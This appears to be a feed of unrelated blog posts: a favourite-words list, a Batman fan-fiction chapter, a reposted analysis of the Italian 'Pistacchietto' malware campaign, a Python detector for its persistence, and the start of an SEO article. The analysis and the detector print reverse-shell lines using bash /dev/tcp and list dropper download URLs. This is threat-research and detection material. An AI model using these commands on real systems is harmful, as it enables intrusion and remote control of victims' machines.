#that's not the same snippet of text obviously copy-pasted in different places on google
tanadrin · 1 year
Favorite words
I keep a file on my computer of my favorite words, which are usually selected for phonaesthetic reasons, or because they are semantically or grammatically interesting. This is the list as of the most recent entries (“velico” and “Ushakaron”):
Individual words
analáugns (Gothic): hidden (nom. m. sg.)
anchorhold (English): the cell of an anchorite, in which the occupant is entombed as a kind of living saint
Apocryphan (invented): from World of Warcraft; proper name, of the pre-Cataclysm location “Apocryphan’s Rest” in the Badlands zone
armōsts (Gothic): poorest (nom. m. sg.)
ashkandi /,æʃ 'kɑn di/ (invented): proper name (World of Warcraft)
bearonæss /'bæɑɹ o ,næs/ (Old English): wooded headland (from bearu, "grove")
beinahrúgu (Old Norse): bone pile (dat. of beinahrúga)
carcern (Old English): prison (from Latin)
coalesce, coalescent (English)
crepuscular (English)
darkling (English): in darkness
daroð (Old English): javelin, projectile, “dart” in the older, more expansive sense
deliquesce (English), become liquid, esp. through organic decomposition
deosil (English): variant spelling of ‘deasil,’ turnwise; from Scottish Gaelic deiseil or deiseal, meaning ‘southward, sunward, counterclockwise;’ see also "widdershins," etymologically "anti-sunwise" and therefore counterclockwise in the northern hemisphere.
effloresce, efflorescence, efflorescent (English): to burst forth into bloom, to flower; from Latin effloresco, “I blossom, I flourish”
Enakro (invented): from Warcraft III; proper name, from the name of the multiplayer map “Enakro’s Way”
Eskhandar /'ɛsk hænd ,dɑɹ/ (invented): from World of Warcraft; proper name
etiäinen (Finnish): a type of folkloric apparition
exarch (English): a Byzantine provincial governor, particularly of an exarchate like Ravenna or Africa, from Greek ἔξαρχος.
fralusanō (Gothic): lost, gone away (nom. f. weak sg.)
gevaisa (invented): a tomb of living words; term of art among wizards of the Discworld; cf. Hebrew geniza, "a storeroom containing books which cannot be used, but which nevertheless cannot be destroyed because they contain God's name"
gnist (Danish): spark; related to OE gnāst, ON gniesta, SWE gnista, OHG gneisto, MHG gneiste
hellwara (Old English): ‘of the inhabitants of hell’ (gen. pl. of f. hellwaru or m. hellwaran)
hnasqus (Gothic): soft; cognate of OE hnesce, “soft,” ModE. dialectical nesh “wimpish, weak”
idaltu (Saho-Afar): elder, firstborn; cf. Homo sapiens idaltu, the (obsolete) classification of the “Herto man” specimen, human remains of about 150,000 years of age discovered in the Afar triangle, which were some of the oldest modern human remains known at the time of their description.
idreigonds (Gothic): repentant (nom. m. sg.)
iktsuarpok (English): the feeling of anticipation waiting for someone to arrive, often leading to repeatedly going outside to check for them; from Inuktitut ᐃᒃᑦᓱᐊᕐᐳᒃ itsoarpok, “goes outside repeatedly to check if a visitor has arrived yet.”
incunabulum (English): an early printed book; something in its infant stages; from Latin incunabula, ‘swaddling clothes, cradle, birthplace.” The change in ending is a result of the medieval form incunabulum, which was a singular back-formation of a noun previously found only in the plural.
incus (Latin): "anvil"
inwitwrāsen (Old English): ‘chain of deceit’
Iolanthe (Greek): proper name meaning ‘flower of the violet’
irgendwo (German): somewhere, anywhere
κακοΐλιον (Ancient Greek): proper name (‘Kakoilion’); dysphemism for Troy; compound of κᾰκός, “bad, vile, evil,” and Ἴλιον, “Ilion/Troy/Wilusa.” Translated variously as "evil Ilios" (A.T. Murray) or "Destroy" (Fagles, pun very much intended); a poetic hapax legomenon in Homer's Odyssey, used by Penelope for Troy.
kasterborous /kæs 'tɝɹ bɔɹ oʊs/ (invented): proper name of the constellation in Doctor Who containing Gallifrey; possibly Gallifreyan
lhammas (invented): the Elvish (Quenya?) name of a work of fictional sociolinguistics by J.R.R. Tolkien outlining the relationship of the languages of Middle Earth, later superseded; borrowed as a term for "a scheme of invented languages; the historical and aesthetic plan of languages in a constructed world; such scheme in the abstract, or a document laying out such a scheme"
lint (invented): quick, clever; possibly coined by Tolkien, and of no particular language; it formed the root of such words in several constructed languages of his that were unrelated, simply because he liked the sound-meaning relationship
listopad (Polish): November; literally, “leaf-fall”
mæw (Old English): seagull
mamihlapinatapai (Yaghan): glossed as ‘a look shared by two people wishing the other would initiate something that they both desire but which neither wants to begin.’ The word is a regular derivation from ihlvpi, “to feel awkward, to be at a loss,’ with various grammatical affixes of voice, aspect, and so forth, and might be more accurately translated as ‘to make each other both feel awkward.’
narthex (English): antechamber or entrance area of some Christian churches; from Greek νάρθηξ, “giant fennel, box for ointments”
neorxnawang (Old English): ‘field of heaven’
opalescent (English): iridescent in a manner resembling opal
orcnaw (Old English): evident
razda (Gothic): voice
reordberend (Old English): ‘voice-bearer,’ i.e., a poetic word for a human being
ríastrad (Irish): battle frenzy, berserker rage, warp spasm
ruinenlust (German): literally ‘desire for ruins;’ yearning for the past evoked by ruins
Saoshyant /'saʊ ,ʃyənt/ (English): eschatological figure of Zoroastrian scripture and tradition who brings about the final renovation of the universe, the Frashokereti. From Avestan 𐬯𐬀𐬊𐬳𐬌𐬌𐬀𐬧𐬝 saoš́iiaṇt̰.
Sargasso (English): proper name applied to a region of the western Atlantic; from Portuguese sargaço, of unknown ultimate origin
searonet (Old English): web of guile, web of cunning
Sumer (English): proper name, from Akkadian Šumeru, of uncertain origin but potentially related to Hebrew שִׁנְעָר Shin’ar, Egyptian sꜣngꜣr , and Hittite Shanhar(a), all meaning “southern Mesopotamia;” has also been linked to the Sumerian endonym 𒊕𒈪𒂵 sag̃-gig-ga, “black-headed people, the Sumerians”
talast (Old English): 2nd person singular present active indicative: thou reckonest, thou dost consider
tīrfæst (Old English): glorious
tramountayne (Middle English fr. Latin via Italian): the north; the north wind; the north star (rare) (from Latin transmontanus)
Tuscarora (English): proper name of a Native American people, from Skarure skarū’ren’, “hemp gatherers.”
Tyree (English): found as a personal name and surname (cf. Mount Tyree in Antarctica, named for a U.S. Navy rear admiral); name of a fictional planet in Star Trek: Deep Space Nine; from Tiree (Scottish Gaelic Tiriodh), the most westerly island of the Inner Hebrides.
Ushakaron (English): proper name of a star; according to unsourced claims, the triple star ξ Tauri, possibly from the Akkadian word for “avenger”
velico (Italian): sailing
westengryre (Old English): ‘terrors of the wasteland, terrors of the desert’
whyssyne (Middle English): cushion
wodwo (Middle English): woodwose, a wild man of the woods
þancoi (Old English): thoughtful
þystro (Old English): darkness (nom./acc. strong n. pl.)
Phrases or expressions
uncleftish beholding ("Uncleftish Beholding," by Poul Anderson, English): "atomic theory" as calqued into solely Germanic roots
proclarush taonas (Stargate SG-1, supposed ‘Ancient’ language): "Taonas, lost in fire"
varg í véum (Vǫlsunga Saga, Old Norse) "a wolf in holy places," i.e., an outlaw (equivalent to skógarmaðr)
wære fræton (Exodus, Old English): "they ate the treaty," i.e., they broke it
hapax legomenon (from Greek ἅπαξ λεγόμενον): a word which occurs only once in a manuscript or particular textual corpus
táiknái andsakanái (Gothic, Luke 2:34), “disputed sign,” cf. KJV, “a sign which will be contradicted.”
batbirdies · 5 years
NaNoWriMo 2019 Batfam Fic part 6
Part 6 of my Jason Todd Batfam fic where Jason eventually agrees to dog sit Titus, there are some deep seated issues, unintended animal therapy, snarky text messages between Robins and eventually some reconciliation between father and son. Takes place in a murky in between time sometime after Damian was resurrected.
Same warnings as other installments: This is a very rough draft that is copied and pasted directly from my working google doc. Expect mistakes. These are also snippets, and there is skipped content between them.
also as for CONTENT; there are some flashbacks to violent things, some violence involving animals, references to dog fighting :(( and things like prostitution and homelessness are mentioned periodically. Also a lot of bad language.
Part 1
Part 2
Part 3
Part 4
Part 5
The dog park, in the end, is nicer than Jason expects. Even though it’s small, it’s got some nice, rolling hills, a couple benches set up at different points, next to small maple trees that look like must have been planted in the last two years, still waiting for them to grow big enough to actually shade the benches. They were naked now, fall being in full swing.
It’s still flipping cold and there’s a light drizzle that’s just uncomfortable, even with the hood of his jacket drawn up. Titus doesn’t seem too happy about it either but he’s got his waterproof coat on and the earmuff-sleeve-thing so he isn’t bothered so much by the cold. He let’s Jason cajole him into playing catch at least and runs freely after the tennis ball he sends flying.
After a bit he seems to get bored with it though and is more interested in the other dogs, so Jason lets him roam without thinking much of it. He looks like a big dumb idiot in the getup he’s got on but it just makes him look more friendly and less intimidating to the other dog owners so Jason counts it as a win when he takes his phone out to snap a picture of Titus sniffing some labradors butt.
“Real polite bud” Jason mumbles under his breath, as he lets his eyes scan over the milling group of people. He doesn’t mean to be doing it, doesn't even realize he’s looking for threats until he spots one.
There are two men standing stock still next to one of the benches, a large Rottweiler sitting next to them with a spiked collar on a thick, black, leather leash. The guys don’t look tough so much as they look mean and Jason can see them watching the dogs, eyeing each one almost critically, staring at Titus for a little longer than he’d like. He doesn’t even really know what he’s looking at but he doesn’t like it, can feel the hair on the back of his neck stand up like some sort of sixth sense.
“Titus!” He lets out a loud whistle, clapping his hands to draw the dogs attention back to him. He trots back over easily, abandoning the other dog he’d be attempting to greet. Jason grabs his collar when he approaches, latching the leash back on, keeping an eye on the two thug looking guys who are now walking slowly in his direction. Jason tries to get a good look at them without making it obvious.
One is tall and thin, a shaved head and a nose that looks like it had been broken on a few different occasions. His eyes are half lidded, he looks bored, and with a brief direct glance he spots a deep scar on the back of his hand, raised and red skin in a curved line that looks distinctly like an animal bite if Jason had to guess.
The other one is heavy set, broad in the shoulders but of average height, close cropped dark brown hair and a chunk missing out of one of his ears. Sharp eyes that are focused directly on Titus. He’s the one holding the leash.
And the dog is the other thing.
Every other dog in the park just seems happy. Either excited and playing or relaxed. Tails wagging, panting, running around or just lazing about near their owners. There’s one half grown mutt on the other side of the park that’s being trained, learning how to sit and stay.
The Rottweiler walking next to this man does not look happy, or friendly, or excited. It’s big, moves gracefully, doesn’t seem to be in any sort of hurry but is looking at Titus and Jason both with eyes that Jason can only think to describe as….empty. If you can even think something like that about a dog.
They’re only 10 feet away when Jason tugs on Titus’ leash, ready to get the hell out of there before something nasty happens. And maybe he’s gotten rusty but he’s just a little too slow.
Just as they turn around the broad shouldered man stoops down and unhooks the Rottweilers leash, says something sharp to the dog that he can’t catch and suddenly he’s lunging.
Jason has been in more fights than he can count, or remember, ones where his life is on the line, but there is nothing quite like having 140 pounds of solid muscle barreling towards you with a snarl like you’ve never heard, teeth bared and ready for sinking.
Titus immediately pulls hard on the leash, and Jason moves without thinking. It’s reflex more than training that has him throwing an arm out, right in the path of the big black dog. The tall thin guy shouts something just as teeth clamp down on his forearm, sink through his leather jacket to his skin and beyond.
“Shit!” Jason shouts, throws his other hand out, dropping the leash, he grabs at one of the dogs ears and yanks, hard, but the clamp down does not loosen, if anything it tightens and the dog lets out a guttural growl. Jason is swearing up a storm, stumbling and nearly falling on his ass trying to pull his arm out of the vice it’s being crushed in. He’s never been bitten by a dog before, at least not beyond a warning snap, and it fucking hurts.
The short guy is suddenly there, clapping his hands, he shouts at the dog again.
“Drop it!” And Jason’s arm is abruptly free, he actually trips and falls on his ass, feeling light headed and instantly furious.
Skinny guy has a hand around the Rot’s collar, holding him in place even though he’s already sitting down, looking business as usual like nothing even happened when there’s blood dripping out of its fucking mouth. Jason’s blood.
“What the fuck is wrong with you?!” Jason hauls himself to his feet, standing just as tall as the skinny guy and broader in the chest than the heavyset one, who looks wide eyed and nervous, in contrast to the tall one, who just seems mildly surprised.
“Holy shit man, I’m so sorry, he just lunged!” The short guy stutters out, fumbling to get the leash back on the dog.
“You expect me to believe that was the dog? I wasn’t born yesterday asshole.” He steps toward the stocky one but the Rot takes a step to meet him, letting out a low growl of warning.
“Whoa, Crusher no.” He swallows harshly, glances back at the tall one, who’d let go of the collar as soon as he attached the lead.
“Crusher? Are you serious?”
“I’m so sorry man, really, I didn’t exp- he’s never done anything like that before.” Jason doubted it, wanted to spit in the guys face.
“Chris, why don’t you take Crusher to the car? I can take it from here.” Guy has an accent like he’s from the West coast, words clear and almost overly pronounced. He’s got one hand stuffed in the pocket of his coat, the other holding a lit cigarette.
“Sure, yeah. I’ll uh, I’ll get him out of the park, just find me when you’re done.” Chris looks distinctly relieved to be out of the conversation.
Jason is reeling, what the actual fuck just happened? What was this? The short one had clearly given the dog some kind of command.
His instincts told him not to let the guy leave, to stop him in his path and get answers, but the dog was still a threat and Jason wasn’t in costume. He didn’t have any armor on and his identity was not hidden. He needed to be careful. His mind also finally registered the ear splitting sound of frantic barking from a large dog and he suddenly realized he hadn’t seen where Titus went.
He’d let go of the leash when the dog attacked and - He whipped his head around, feeling frantic for a split second before he spotted him just a few feet away, some random bystander holding his leash wrapped around a hand. It was a stocky woman, middle aged, and with a fat bulldog of some kind standing behind her. She looked stricken, face pale. Titus was pulling pretty hard on the leash and barking in a high pitched tone that definitely wasn’t natural for him, a near whine to it, but the woman stood her ground, feet planted hard.
Jason was distracted enough that the guy was already shuffling away, the Rottweiler following at matched pace. He should go after the guy, wanted very badly to go after him but he couldn’t leave some random woman with Titus, who was obviously frantic and upset.
Jason eyes Tall Guy, still standing there and watching him, expectant and bored look on his face, decidedly turns his back on him to handle Titus. The guy isn’t a threat, not to him, even if he has a weapon his posture is slouched, feet planted sloppily, his balance isn’t solid. He’s obviously not trained to fight and Jason could take him in a heartbeat if he felt the need. He needed to get his head back on straight before he talked to him, there was a heat curling in his stomach with a distinctive green tinge Jason needed to get a handle on.
He marched up to the woman with the bulldog, tucking his bleeding arm in close to his side. He was fuming, furious and totally struck dumb like he couldn’t remember being. He almost wondered if they knew who he was, why else would they randomly sick a dog on him?
“Are you alright?” The woman asked when he approached, eyebrows drawing up in the middle.
“Fine.” He tried not to snap at her, since she was literally the only reason Titus probably hadn’t either run away or gotten in a fight with that dog when it bit him, but he was so tightly wound it was hard to keep the edge out of his voice. “Thank you for grabbing his leash.”
She nodded, Titus shoved into him, lifting his front half off the ground repeatedly like he wanted to jump on him, whining, ears down. “I’m fine, buddy, I’m good. Stay down.” He grabbed Titus collar with his good hand and pulled down gently to get him to stay planted in the grass, he didn’t need to get clawed in the arm after that.
“Are you really sure you’re alright? You’re bleeding pretty….pretty bad.” She sounded a little breathless, as she finally relinquished Titus’ leash to him. She grabbed at her ponytail with her now free hand and tugged on it, a nervous habit if he’d ever seen one.
“I’ve had worse.” He was too busy looking over Titus and making sure there were no injuries he’d missed, that he wasn’t too late to keep the Rot away from him that he didn’t see how she reacted to that little confession. The ear muff thing had fallen down and he carefully tugged it back up over his ears, while trying to even out his breathing.
“That was pretty nuts man.” Jason stiffened and turned back, Tall Guy standing there, cigarette in hand, he took a long drag. “Why jump in like that? Your dog looks like he could hold his own in a fight.” And he was staring at Titus when he said it, eyes still bored, as they flicked up to meet Jason’s. Jason felt his shoulders hitching up.
“We should really call the police.” The woman interjected. “That dog is dangerous, need to-“
“No police.” Jason snaps just as Tall Guy says, “I don’t really think that’s necessary.”
“Not Necessary?” Her voice is sharp. “Your dog just attacked this man, he’s bleeding, he could have a broken bone or-“
“Nothing’s broken lady.” She snapped her eyes to him, looking at him like he was nuts.
“Regardless, I’m calling the police.” She reached in his purse, hanging off her shoulder and pulled out a cell phone. This was not good - the last thing Jason needed was to be questioned by the police while Bruce was out of town, even if he was a victim, he didn’t need to be recognizable to anyone, didn’t need Barbara recognizing his fake ID in a police report and drawing this whole incident up.
He also didn’t know why any of this just happened, and if somehow this guy knew who he was….he didn’t want a civilian mixed up in that.
“Look lady.” He snapped at her, feeling guilty for the way she flinched back from him. “I appreciate the concern but I’d rather handle this myself.” He put a hint of threat in his voice, for both her and the asshole’s sake. Jason knew what he looked like, big, broad shouldered, well built and with a massive dog. “I don’t really think you wanna be involved.”
Her eyes darted between Jason and Tall Guy, like maybe she wanted to argue, but was quickly thinking better of it. She clutched her own dog’s leash in a fisted grip, expression morphing to wary suspicion.
“Fine. Guess I’ll find a new dog park.” She snapped before turning on her heel and marching away. Bulldog waddling after her.
Smart lady, Jason thinks as he watches her go. Finally turning back to the guy who’s just standing there, enjoying his cigarette without a care in the world.
terabitweb · 5 years
Original Post from Security Affairs Author: Pierluigi Paganini
In the past weeks, a new strange campaign emerged in the Italian cyber threat landscape; it has been tracked as “Operation Pistacchietto.”
Introduction
In the past weeks, a new strange campaign emerged in the Italian landscape. It has been baptized “Operation Pistacchietto” after a username extracted from a Github account used to serve some parts of the malware. This campaign was initially studied by C.R.A.M. researchers, who reported that the attacker seems to be Italian, as evidenced by some Italian words like “pistacchietto” or “bonifico” found in the analyzed file names and scripts, and by the location of most of the command and control servers.
Figure 1. Servers’ location.
After an initial recon, Cybaz-Yoroi ZLAB detected some peculiarities and interesting TTPs in place in this malicious operation, so we decided to dig further and analyze more samples related to this mysterious actor.
Technical analysis
The campaign is not trivial: it is composed of several specific pieces of malware, created to hit devices belonging to different platforms, both desktop and mobile. In the following sections, we analyze some of this malware, divided by the targets’ architecture.
MS Windows Samples
The story starts from a basic fake Java page, inviting the user to update his Java version clicking on the link. 
Figure 2. Fake Java update page.
Although the page reports the filename “window-update.hta”, clicking on “Update” downloads a .bat file.
Hash: a22ac932707e458c692ba72e5f4ddb3317817ac3a9a1ccbcccbdf720a9bd2cd4
Threat: Unknown
Description: BAT downloader
ssdeep: 192:/eIsseWdvqEB45kY7EBk2k0EBxbkdEBBmk/kgkWOQmxl1LXqiV/uvN:/wyB4WYwBkRNBeKBBBsDWwFw
Uploading this .bat file to VirusTotal shows that it has a very low detection rate: only four anti-malware engines were able to detect it.
Figure 3. Detection rate of the initial BAT dropper.
Inspecting the win.bat source code, at first glance it seems to be written by a script kiddie, or to be a first draft, due to the huge amount of comments. The script is composed of two parts: the first includes a trick to ask the user for administrative privileges, and the second downloads other components and sets persistence using the Windows Task Scheduler (schtasks). As shown in the figure, the first part simply corresponds to a code snippet retrieved from public Github repositories.
Figure 4. Comparison between the attacker’s code and the Github’s one.
The second part, instead, checks the machine architecture and, depending on it, the malware downloads the right components, that are:
A text file containing new actions to execute, from config01.homepc[.it/svc/wup.php?pc=pdf_%computername%
The NETCAT utility for Windows, from config01.homepc[.it/win/nc64.exe and config01.homepc[.it/win/nc.exe
The WGET utility for Windows, from config01.homepc[.it/win/wget.exe and config01.homepc[.it/win/wget32.exe
Other malicious artifacts, from:
config01.homepc[.it/win/get.vbs
config01.homepc[.it/win/sys.xml
config01.homepc[.it/win/syskill.xml
config01.homepc[.it/win/office_get.xml
config01.homepc[.it/win/woffice.exe
config01.homepc[.it/win/init.vbs
config01.homepc[.it/win/winsw.exe
Figure 5. Part of BAT dropper’s code.
From the snippet, a series of commented-out URL paths emerges, which is proof that the malware is still under maintenance. Indeed, during the days of the analysis, the bat file and some other artifacts were constantly changed and updated, adding and removing code lines and changing variable names, but without changing the server URL or the general behavior. These modifications, even if related to the attacker’s trials or test cases, keep the file’s detection rate constantly low, because its signatures change each time.
Other URLs embedded in the script, commented out, are:
hxxps://github[.com/pistacchietto/Win-Python-Backdoor/raw/master
hxxp://verifiche.ddns[.net/{some_files}
Inspecting the repository, we found some artifacts also hosted on the config01.homepc[.it/win/ location, so probably the attacker used that platform during the development phase and config01.homepc[.it as the real server containing “production” malware. The URL verifiche.ddns[.net seems to be down at the time of writing; it could be a server used in an old version of this malicious project or in a future one.
After downloading all the components, the batch script implants most of them into the %windir% folder and one of them, the core of the malware, into C:\Program Files\Windows Defender. Then, the script registers some automatic tasks through schtasks in order to start the malicious artifacts periodically.
Figure 6. Instructions to schedule the backdoor execution.
The following section reports a brief analysis of these malicious files.
Sample “office_get.xml”
Hash: 1061e997486c793ab5561fd7df0c2eb36b9390a564101e7ae5cc8dbf9541f750
Threat: Unknown
Description: XML Task Scheduler Config
ssdeep: 48:yei1q9dBQSRiylw9c9V9LTra+iaiudupRCRvA9ufAuRa7T5XHPsV8icvOyp+++:tdBdRiyuwdiaigVA9ll7dHFFvOC+
It is a simple XML file that defines the configuration for a new scheduled task. In particular, the task created using this configuration file has the sole purpose of periodically executing a VisualBasic script located at C:\WINDOWS\get.vbs.
Figure 7. Command embedded into XML file.
Sample “get.vbs”
Hash: 6edbf8b3f94d29be7c24676fbf2d1e4cdf00b1f7b9f31c2ce458d1e21b23af97
Threat: Unknown
Description: VBS script
ssdeep: 48:eTGvmB9tJWBVn/Bn6+pmcN+yEa/5noEW/hRbr94fIn9+0RYcSniTGFurRwx:eTGO1Yr/V6gmDyPJoE0hxGfIn9D1ITlx
The script downloads a shared file from Google Drive, https://drive.google[.com/uc?export=download&id=1nT2hQWW1tOM_yxPK5_nhIm8xBVETGXdF, using a MSXML2.ServerXMLHTTP object. The file contains a list of server URLs, as shown in the figure:
Figure 8. C2’s IP addresses.
Two of them are IPv6 addresses: the usage of the new IP address standard is a rare feature in the malware landscape. The whois information related to these IPv6 addresses shows that they are registered to the global ISP Hurricane Electric. This company also provides a free IPv6 Tunnel Broker service, able to act as a link between the IPv4 and IPv6 protocols. There is no direct evidence of activity on those IPv6 addresses; however, we think the attacker probably decided to masquerade its C2, which normally works over IPv4, behind Hurricane’s IPv6 tunnel in order to make detection more difficult.
During the check-in, the malware proceeds to extract some PC information, like the computer name and MAC address, which is sent to the server using a path composed as follows:
http://" & serverURL & "/svc/wup.php?pc=" & strComputerName & "_" & mac
The server responds with an encoded message indicating new actions the malware should perform. However, the VBS script seems to check only the “exec” field, as shown in figure.
Figure 9. Response from C2.
If the “exec” parameter is set to “1”, the script extracts the value of the “cmd” parameter, containing the new command to execute, and runs it in the shell. All the other fields are, at the moment, not considered by the malware, indicating that it may still be under development.
Figure 10. If EXEC parameter is set, execute the specified command.
After executing the received commands, the script opens a connection towards the malicious server using the Netcat tool previously downloaded, providing the attacker with access to the victim’s shell.
Figure 11. Command to establish remote connection towards C2.
Samples “woffice.exe”, “woffice2.exe” and “NisSrv.exe”
Hash: 3eecd459aa454f7973048af310c7086ff4a74efd5a3aee9f909cca324a0e2013
Threat: Unknown
Description: EXE from woffice
ssdeep: 196608:eC0ma2TBEF4nfFzqgncRxhocAU/kfCf+51loM8XdFu/apXLl:eCI26dGnfCW51ittnNLl
The “woffice2.exe” and “NisSrv.exe” files are equal to “woffice.exe”, which is simply the compiled version of “woffice.py”, the Python source file hosted in the “Pistacchietto” repository. The Python code has the same behavior as the VBS bot previously analyzed, but it uses different C2 URLs, such as:
Figure 12. Other C2 IPs embedded into the “woffice.py” file.
So, the attacker created different copies of the same malicious backdoor and set them to run at the same time, probably as a resilience technique.
Samples “sys.xml” and “syskill.xml”
Hash: a9f5e4c294ce6fb3bbdc4cd1ce3b23136005ce1dd57b2e8d20ed2161eea9f62b
Threat: Unknown
Description: XML Task Scheduler Config
ssdeep: 48:yei1q9dBQSJiydw9c9V9Lvara+iaiudupRCRvA9ufAuRa7T5XhPsV8iILG+++:tdBdJiyGiGdiaigVA9ll7dhF2+

Hash: 6d3e7adcf9626bbee6935c6e8ced13831ac419be19b9d13bc361bda402fbaca7
Threat: Unknown
Description: XML Task Scheduler Config
ssdeep: 48:yei1q9dtQSJiydw9c9V9Lvara+iaiudupRCRvA9ufAuRa7T5XhPsV8ioXy+++:tdtdJiyGiGdiaigVA9ll7dhF0+
These files are two XML task scheduler configurations, which embed the following commands:
Figure 13. Commands embedded into XML file.
So, the first one starts a TCP connection every 1 minute using Netcat (“nc64.exe”), as previously shown, towards a new server “config02.addns[.org”. The second one, instead, kills all the active processes named “nc64.exe” every 5 minutes.
Linux, OSX and Android Samples
The attacker’s arsenal seems to be composed of weapons for different architectures: beyond Windows, there are some samples related to Linux, Mac, and Android devices.
In the Windows, Linux and Mac variant of the malware, the behavior is always the same: it implants the automatic execution of the Python backdoor previously shown.
Hash: 61aaf7b301ed9f574ec3e37428e0e9c62875ddf8a075897408d5b1eb612097cc
Threat: Unknown
Description: Office.py Linux backdoor
ssdeep: 96:Urlxr+CkrZcGbSRonYZm/ZCweAM2eiuVzZ9Q6CsW7XpyMZEg59y5E6AwKwA:U7+CkrZcfnZgZEiuWEMZHs5E6+
The following figure shows the initial bash file used to set the schedule of the “woffice.py” backdoor, through the “crontab” and “systemctl” Linux commands.
Figure 14. Linux initial BASH dropper.
Obviously, all the Windows commands executed in the Win version of the backdoor must be replaced by the Unix ones. So, the command “bash -i >& /dev/tcp/ip/port 0>&1” takes the place of the instruction used to establish the Netcat reverse shell in Windows.
Figure 15. Linux commands used to establish a connection with C2.
The Mac backdoor is very similar to the Linux one; once again, “woffice.py” is the core payload.
Hash: 008bab1cc06a8c9fcdbc0e539d7709de0d163acaf26d90c78c00e7c58fa29fc3
Threat: Unknown
Description: Office.py OSX backdoor
ssdeep: 96:qTXEPcRrdj9iGxGy8g/VEhhBpypDR9jxmCY3leO2pDR9jx5jYO74MkWI7G9xcst:q9due/cfypO2z4M2Gl
Figure 16. OSX backdoor’s setup file.
Analysis of the repository shows that it is a copy of an OSX backdoor discussed in this blog post. Starting from this code, the attacker edited some modules to embed it in its own version of the backdoor.
Moreover, the malicious arsenal also counts an Android RAT. It is a copy of the popular “AhMyth Android Rat”, edited by the attacker to include its command and control servers’ IP addresses.
Figure 17. Part of AhMyth RAT’s code modified by the attacker.
Conclusions
The “Pistacchietto” operation is more complex than we initially thought. Behind the lack of professional infrastructure, the “hiding in plain sight” strategy, the developer’s comments, the draft malware code analyzed and the speculations about the possible amateur nature of this actor, we are facing a long-running espionage operation, active for years, that supports at least four of the main computing platforms available today: it is able to infect Microsoft Windows hosts, Mac OSX systems, Linux servers and Android mobile devices.
We are still not aware of the purposes of this campaign, which could most likely be personally motivated rather than financially motivated or state sponsored, but despite its limited numbers it represents an important warning that security communities, individuals and companies should not ignore. Offensive capabilities to run criminal espionage operations are becoming ever more accessible to personally motivated cyber actors, confirming the expansion of the cyber threat panorama, in both volume and variety, observed by security firms, observatories and associations over the past decade.
As a final remark, we would like to recall that Italy is not new to this kind of “fai-da-te” (homemade) espionage operation: back in 2017, the initially homemade Occhionero espionage campaign (CERT-Yoroi Early Warning N010117) touched Public Administrations, notorious entrepreneurs and also the Italian Ex Prime Minister.
Further technical details, including Indicators of Compromise, are reported in the analysis published by the experts at the Cybaz-Yoroi ZLAB:
https://blog.yoroi.company/research/op-pistacchietto-an-italian-job/
Pierluigi Paganini
(SecurityAffairs – Op Pistacchietto, malware)
The post Cybaz-Yoroi ZLAB shed the light on Op. ‘Pistacchietto’: An Italian Job appeared first on Security Affairs.
0 notes
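A defender-side check for the Linux persistence described in the Op. ‘Pistacchietto’ post above (the “woffice.py” backdoor scheduled through “crontab” and “systemctl”, and the bash /dev/tcp shell). This is an added example, not code from the original analysis; the function names, rule labels, file path and sample inputs are assumptions constructed for illustration.

```python
import re

# Indicators named in the write-up: the backdoor file name and the bash
# /dev/tcp reverse-shell idiom. Rule names are hypothetical labels.
INDICATORS = {
    "woffice_backdoor": re.compile(r"\bwoffice\.py\b", re.IGNORECASE),
    "bash_dev_tcp_shell": re.compile(
        r"bash\s+-i\s*>&\s*/dev/(?:tcp|udp)/[^\s/]+/\d+"),
}

def _hits(text):
    """Names of every indicator that matches the given text."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]

def scan_cron(text, source="crontab"):
    """Flag active (non-comment) crontab lines that match an indicator."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue  # commented-out entries are never scheduled
        findings += [(source, lineno, name) for name in _hits(stripped)]
    return findings

def scan_unit(text, source="unit"):
    """Flag Exec* directives of a systemd unit that match an indicator."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        key, sep, value = line.partition("=")
        if sep and key.strip().startswith("Exec"):
            findings += [(source, lineno, name) for name in _hits(value)]
    return findings

# Constructed samples; the path is made up, 192.0.2.10 is a documentation address.
SAMPLE_CRON = """\
# m h dom mon dow command
*/5 * * * * /usr/bin/python /opt/example/woffice.py
0 3 * * * /usr/local/bin/backup.sh
# */1 * * * * bash -i >& /dev/tcp/192.0.2.10/4444 0>&1
"""
SAMPLE_UNIT = """\
[Unit]
Description=constructed sample
[Service]
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/192.0.2.10/4444 0>&1'
Restart=always
"""

if __name__ == "__main__":
    for finding in scan_cron(SAMPLE_CRON) + scan_unit(SAMPLE_UNIT):
        print(finding)
```

On a live host the same functions can be fed the output of `crontab -l` and the contents of unit files under `/etc/systemd/system`.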
How machine learning levels the SERP playing field
We don’t ordinarily think of Google when we think about competition in the digital marketing world, since it seems to reliably dominate most areas in which it does business. A recent segment discussing corporate monopolies on John Oliver’s “Last Week Tonight” hilariously referenced Bing as the dominant search engine with a graphic that stated, “Bing. The best place to Google something.”
For the most part, however, the digital marketing sphere has been a fairly competitive landscape, though there were exceptions to this maxim. Established brands frequently dominated top SERP positions because of long-standing trust, fresh domains had to wait their turn in line, and black-hat SEO allowed webmasters to game the system and deliver high rankings for thin content. A decade ago, SEO agencies and webmasters could apply simple heuristics and buzzworthy keywords to rank content regardless of its utility to user intent or actual quality.
The Hummingbird update and subsequent rollout of RankBrain changed all of these notions entirely.
They should also be changing SEOs’ ideas of how to achieve success. Though many SEO experts understand the importance of RankBrain, or at least how important it will be, they still employ conventional strategies we made a living off of a decade ago.
In this column, I’ll explain why you should remodel the way you look at search engine optimization. And I’ll also offer some advice on machine learning applications and SEO strategies you can employ to compete in the cutthroat SEO landscape.
How machine learning revolutionized search
Machine learning is a subset of artificial intelligence that allows computers to learn independently of human intervention, learning in iterations by grouping similar properties and determining values based on their shared properties.
Google’s RankBrain, which the company says is its third most important ranking factor, is applied to determine the context of new search queries that it has not received before. RankBrain distinguishes the context of unlearned searches by pulling semantically similar keywords/phrases and comparing them with similar past searches to deliver the most relevant results.
Google employs machine learning technology to find patterns and make sense of relevant data when it analyzes user engagement with web pages in its SERP listings. With this data, Google’s algorithm evaluates user intent. From Google’s perspective, this helps filter results more effectively and rewards users with a better experience.
Currently, conventional signals are still applied to rank the best results. With each subsequent, relevant search, machine learning can analyze which web pages are receiving the best user signals and provide the best results to meet user intent. It’s important to note that machine learning isn’t instantaneous but would result in slow ranking changes based on growing data from its SERPs.
This has two broad implications for keyword research and ranking:
